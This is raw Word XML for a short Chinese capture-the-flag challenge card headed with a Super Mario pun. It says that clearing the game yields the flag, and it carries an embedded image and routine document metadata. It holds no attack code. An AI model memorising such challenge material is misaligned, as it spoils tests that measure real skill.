    <w:p w14:paraId="03F6ED73" w14:textId="4623DE01" w:rsidR="00254A99" w:rsidRDefault="00254A99" w:rsidP="00254A99">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD1DA1">
        <w:t>我勒个超级</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD1DA1">
        <w:t>玛丽奥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33000E2C" w14:textId="77777777" w:rsidR="00254A99" w:rsidRPr="00CD1DA1" w:rsidRDefault="00254A99" w:rsidP="00254A99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1DA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2C8D12" wp14:editId="5C2CB245">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-220980</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>784225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3924935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="823854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4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只要通关即得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5F044A" w14:textId="77777777" w:rsidR="00254A99" w:rsidRPr="00254A99" w:rsidRDefault="00254A99"/>
    <w:sectPr w:rsidR="00254A99" w:rsidRPr="00254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C900" w14:textId="77777777" w:rsidR="0072534B" w:rsidRDefault="0072534B" w:rsidP="004F7831">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="236ECBC5" w14:textId="77777777" w:rsidR="0072534B" w:rsidRDefault="0072534B" w:rsidP="004F7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EA39" w14:textId="77777777" w:rsidR="0072534B" w:rsidRDefault="0072534B" w:rsidP="004F7831">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="798BD129" w14:textId="77777777" w:rsidR="0072534B" w:rsidRDefault="0072534B" w:rsidP="004F7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19A92C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE19A9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DB0AF2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DB0AF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C5493BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C5493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4B47E302"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B47E3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92687876">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="582297971">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1696006761">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="5258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AD"/>
    <w:rsid w:val="00254A99"/>
    <w:rsid w:val="004F7831"/>
    <w:rsid w:val="0072534B"/>
    <w:rsid w:val="008170B1"/>
    <w:rsid w:val="00B85AAD"/>
    <w:rsid w:val="00BD4B1F"/>
    <w:rsid w:val="00C0175B"/>
    <w:rsid w:val="30E6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97634"/>
  <w15:docId w15:val="{27140238-8C5C-4235-95E7-67ACFEB82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5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:rsid w:val="004F78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F783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F7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F783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皓翔 杨</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-24T15:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-24T15:19:00Z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eyJoZGlkIjoiMGYxZGJmMjI5M2JlYmFjMDA3ZTQ3MTUzYjFmNGZkMTAiLCJ1c2VySWQiOiIxMzk2MTIxNDIzIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>22A266AA6C394CBB89651B683A60DE7D_12</vt:lpwstr>
  </property>
</Properties>
</file>